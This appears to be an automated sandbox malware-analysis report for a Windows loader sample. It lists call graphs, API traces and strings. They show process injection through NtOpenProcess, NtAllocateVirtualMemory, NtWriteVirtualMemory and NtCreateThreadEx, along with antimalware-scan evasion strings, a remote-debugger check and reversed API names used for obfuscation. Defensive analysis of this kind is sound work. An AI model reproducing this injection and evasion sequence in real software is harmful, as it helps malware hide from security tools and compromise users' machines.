2897a2c call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6365->6430 6430->6248 6475 289bcce-289bf3e call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289afd4 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6430->6475 6548 289c0dc-289c23a call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6475->6548 6549 289bf44-289bf45 6475->6549 6635 289c23c-289c261 call 289af24 6548->6635 6636 289c266-289cb68 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 289afe0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2897d78 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 GetModuleHandleW call 2898274 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 NtCreateThreadEx call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6548->6636 6551 289bf49-289c0c0 call 289afd4 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 call 2884860 call 28849a0 call 28846d4 call 28847ec call 28849a0 call 28846d4 call 28989d0 6549->6551 6640 289c0c5-289c0d6 6551->6640 6635->6636 6911 289cb6d-289cd23 call 289894c * 5 call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2884860 call 28849a0 call 28847ec call 28849a0 call 289894c call 2898080 call 289894c * 2 6636->6911 6640->6548 6640->6551 6911->6248
                                                                            APIs
                                                                              • Part of subcall function 028989D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0290738C,Function_0000662C,00000004,0290739C,0290738C,05F5E103,00000040,029073A0,74AE0000,00000000,00000000), ref: 02898AAA
                                                                            • GetModuleHandleW.KERNEL32(ntdll,NtOpenProcess,UacScan,02907380,0289CFC0,ScanString,02907380,0289CFC0,ScanBuffer,02907380,0289CFC0,ScanString,02907380,0289CFC0,UacScan,02907380), ref: 0289B3EA
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtOpenProcess.NTDLL(02907584,001F0FFF,02907318,02907330), ref: 0289B4E8
                                                                              • Part of subcall function 02882EE0: QueryPerformanceCounter.KERNEL32 ref: 02882EE4
                                                                              • Part of subcall function 02897A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            • IsBadReadPtr.KERNEL32(0E960000,00000040), ref: 0289B95F
                                                                            • IsBadReadPtr.KERNEL32(?,000000F8), ref: 0289B98C
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            • GetModuleHandleW.KERNEL32(ntdll,NtCreateThreadEx,UacScan,02907380,0289CFC0,ScanString,02907380,0289CFC0,06700000,06700000,0EB90000,18C157FD,02907588,OpenSession,02907380,0289CFC0), ref: 0289C807
                                                                            • NtCreateThreadEx.NTDLL(02907560,02000000,02907318,06701617,06701617,00000000,00000000,00000000,00000000,00000000,00000000,ScanBuffer,02907380,0289CFC0,UacInitialize,02907380), ref: 0289CA18
                                                                              • Part of subcall function 0289894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                              • Part of subcall function 0289894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                              • Part of subcall function 0289894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryModuleProc$FreeMemoryReadVirtual$AllocateCounterCreateLoadOpenPerformanceProcessQueryThreadWrite
                                                                            • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtCreateThreadEx$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$ntdll
                                                                            • API String ID: 341001173-1870492900
                                                                            • Opcode ID: 512123d5e9c728dc6001291f76614515c6e9255a71aad4c67086edffa5c42187
                                                                            • Instruction ID: 262467d69bb8f01826b5b8d36a1c5ce8dd7d022b5095aa853ee8fc923dc41684
                                                                            • Opcode Fuzzy Hash: 512123d5e9c728dc6001291f76614515c6e9255a71aad4c67086edffa5c42187
                                                                            • Instruction Fuzzy Hash: 14F2EE3EB4411A9FDF51FB68DC80BDE73B6AF85300F5440A2A008EB615DA71AE46CF56
                                                                            Function 02885ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 10172 2885acc-2885b0d GetModuleFileNameA RegOpenKeyExA 10173 2885b4f-2885b92 call 2885908 RegQueryValueExA 10172->10173 10174 2885b0f-2885b2b RegOpenKeyExA 10172->10174 10179 2885b94-2885bb0 RegQueryValueExA 10173->10179 10180 2885bb6-2885bd0 RegCloseKey 10173->10180 10174->10173 10175 2885b2d-2885b49 RegOpenKeyExA 10174->10175 10175->10173 10177 2885bd8-2885c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10175->10177 10181 2885c0f-2885c13 10177->10181 10182 2885cf2-2885cf9 10177->10182 10179->10180 10183 2885bb2 10179->10183 10185 2885c1f-2885c35 lstrlenA 10181->10185 10186 2885c15-2885c19 10181->10186 10183->10180 10187 2885c38-2885c3b 10185->10187 10186->10182 10186->10185 10188 2885c3d-2885c45 10187->10188 10189 2885c47-2885c4f 10187->10189 10188->10189 10190 2885c37 10188->10190 10189->10182 10191 2885c55-2885c5a 10189->10191 10190->10187 10192 2885c5c-2885c82 lstrcpynA LoadLibraryExA 10191->10192 10193 2885c84-2885c86 10191->10193 10192->10193 10193->10182 10194 2885c88-2885c8c 10193->10194 10194->10182 10195 2885c8e-2885cbe lstrcpynA LoadLibraryExA 10194->10195 10195->10182 10196 2885cc0-2885cf0 lstrcpynA LoadLibraryExA 10195->10196 10196->10182
                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02880000,028AE790), ref: 02885AE8
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B06
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02880000,028AE790), ref: 02885B24
                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02885B42
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02885B8B
                                                                            • RegQueryValueExA.ADVAPI32(?,02885D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02885BD1,?,80000001), ref: 02885BA9
                                                                            • RegCloseKey.ADVAPI32(?,02885BD8,00000000,?,?,00000000,02885BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02885BCB
                                                                            • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02885BE8
                                                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02885BF5
                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02885BFB
                                                                            • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02885C26
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885C6D
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885C7D
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02885CA5
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02885CB5
                                                                            • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02885CDB
                                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02885CEB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                            • API String ID: 1759228003-2375825460
                                                                            • Opcode ID: fd500b2efa21bca25f147a5ecf241adbbc28935aad7603bad11f1948da1b5251
                                                                            • Instruction ID: 4b6ea39a591f4263f484ef40b618c0d94c43b0bf27b8ee99f386d7313f08bdd1
                                                                            • Opcode Fuzzy Hash: fd500b2efa21bca25f147a5ecf241adbbc28935aad7603bad11f1948da1b5251
                                                                            • Instruction Fuzzy Hash: 5851BC7DA4025D7EFB21E6E4CC45FEF77AD9F04744F4101A1AB08E6181DBB89A448F62
                                                                            Function 0289894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 12432 289894c-2898971 LoadLibraryW 12433 28989bb-28989c1 12432->12433 12434 2898973-289898b GetProcAddress 12432->12434 12435 289898d-28989ac call 2897d78 12434->12435 12436 28989b0-28989b6 FreeLibrary 12434->12436 12435->12436 12439 28989ae 12435->12439 12436->12433 12439->12436
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize,029073A8,0289A93C,UacScan), ref: 02898960
                                                                            • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0289897A
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029073A8,0289A587,ScanString,029073A8,0289A93C,ScanBuffer,029073A8,0289A93C,Initialize), ref: 028989B6
                                                                              • Part of subcall function 02897D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02897DEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                            • String ID: BCryptVerifySignature$bcrypt
                                                                            • API String ID: 1002360270-4067648912
                                                                            • Opcode ID: 11298bd77398292ad64fe3df46036eea709aa6e412a8d0f63fe2f5d01ed3a152
                                                                            • Instruction ID: 66405df0dfecaad648b8d981aec2139967865e5aec720b60295840b97b543af4
                                                                            • Opcode Fuzzy Hash: 11298bd77398292ad64fe3df46036eea709aa6e412a8d0f63fe2f5d01ed3a152
                                                                            • Instruction Fuzzy Hash: F7F08CB9AC825C9EF710A6E9B8C9BF6B7DC9782635F040929A908C6284D67138518B61
                                                                            Function 0289F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 12449 289f744-289f75e GetModuleHandleW 12450 289f78a-289f792 12449->12450 12451 289f760-289f772 GetProcAddress 12449->12451 12451->12450 12452 289f774-289f784 CheckRemoteDebuggerPresent 12451->12452 12452->12450 12453 289f786 12452->12453 12453->12450
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KernelBase), ref: 0289F754
                                                                            • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0289F766
                                                                            • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0289F77D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                            • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                            • API String ID: 35162468-539270669
                                                                            • Opcode ID: 967decebe5242fae912f15662ccb989d0f2c05d72b839bdf24eca38643012625
                                                                            • Instruction ID: 7195db2b506cb3a982eda4ae9ec39444efc3d9886f00f4c043e36aa652b16986
                                                                            • Opcode Fuzzy Hash: 967decebe5242fae912f15662ccb989d0f2c05d72b839bdf24eca38643012625
                                                                            • Instruction Fuzzy Hash: 8FF0A77C9042D8BAEF14A6B888C87DCFBA95B15338F2843909535E25C1F7760680CA51
                                                                            Function 0289DD70 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDAB
                                                                            • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0289DE40), ref: 0289DDDB
                                                                            • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0289DDF0
                                                                            • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0289DE1C
                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0289DE25
                                                                              • Part of subcall function 02884C60: SysFreeString.OLEAUT32(0289F4A4), ref: 02884C6E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                            • String ID:
                                                                            • API String ID: 1897104825-0
                                                                            • Opcode ID: 0e430d13c69db6fd089333aded0d9b9826c599f8b4062dd9646899ac5eed2529
                                                                            • Instruction ID: b8e377d07c7ad5d25ccc48dc617b0f7449c2a5538efba1d1d1ede3f20c5d78c7
                                                                            • Opcode Fuzzy Hash: 0e430d13c69db6fd089333aded0d9b9826c599f8b4062dd9646899ac5eed2529
                                                                            • Instruction Fuzzy Hash: FF21C07AA40209BAEB51FAE8CC52FDE77ADEB48700F540465B600E7581EA74AA048B55
                                                                            Function 0289E4B8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0289E5F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: CheckConnectionInternet
                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                            • API String ID: 3847983778-3852638603
                                                                            • Opcode ID: e5f07e1c2b854a9a2f78113a9c2121cb0752ab46ec6a20a14d2917b5c0733241
                                                                            • Instruction ID: a1bd2376ed25e5774bed3e0f11b46415f66d031d50f134728fe99dfa02c266f4
                                                                            • Opcode Fuzzy Hash: e5f07e1c2b854a9a2f78113a9c2121cb0752ab46ec6a20a14d2917b5c0733241
                                                                            • Instruction Fuzzy Hash: AE41113EB0010DABEF11FBA8D841ADE77BAEF88700F144466E041E7652EA75AD05CF56
                                                                            Function 0289DC8C Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 02884F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02884F2E
                                                                            • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0289DD5E), ref: 0289DCCB
                                                                            • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0289DD05
                                                                            • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0289DD32
                                                                            • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0289DD3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                            • String ID:
                                                                            • API String ID: 3764614163-0
                                                                            • Opcode ID: b66d2a41a8808f4ba89f252672a8ea29623e5d7f9e9773cb5318d08b62f58a57
                                                                            • Instruction ID: 3e01861fee758637de8df63c9af711fa50ee597857f3ca144786a01ae4081e45
                                                                            • Opcode Fuzzy Hash: b66d2a41a8808f4ba89f252672a8ea29623e5d7f9e9773cb5318d08b62f58a57
                                                                            • Instruction Fuzzy Hash: 9C21E07AA40209BAEB20EBA8DD42FDEB7BDEB05B00F554461B600F75D0D7B47A048B65
                                                                            Function 02897A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
                                                                              • Part of subcall function 02898274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,028982FC,?,?,00000000,00000000,?,02898215,00000000,KernelBASE,00000000,00000000,0289823C), ref: 028982C1
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 028982C7
                                                                              • Part of subcall function 02898274: GetProcAddress.KERNEL32(?,?), ref: 028982D9
                                                                            • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02897A9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1782884776.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                            • Associated: 00000000.00000002.1782861328.0000000002880000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.0000000002907000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1783177616.00000000029FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2880000_AWkpqJMxci.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                            • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                            • API String ID: 4072585319-445027087
                                                                            • Opcode ID: 939437f37a4c341439f33f6f43cb435656f9e8da9a81dcceabfb75f63083abf8
                                                                            • Instruction ID: 071495c140d6516607bdb626f4b755f3e61f06fb70da66c876ed6f486a7196f8
                                                                            • Opcode Fuzzy Hash: 939437f37a4c341439f33f6f43cb435656f9e8da9a81dcceabfb75f63083abf8
                                                                            • Instruction Fuzzy Hash: 4B112D7D654209BFEF04EFA8EC81FAEB7EEEB49710F544460B900D7640E674BA108B65
                                                                            Function 02897A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0289823C,?,?,00000000,?,02897A7E,ntdll,00000000,00000000,02897AC3,?,?,00000000), ref: 0289820A
                                                                              • Part of subcall function 028981CC: GetModuleHandleA.KERNELBASE(?), ref: 0289821E
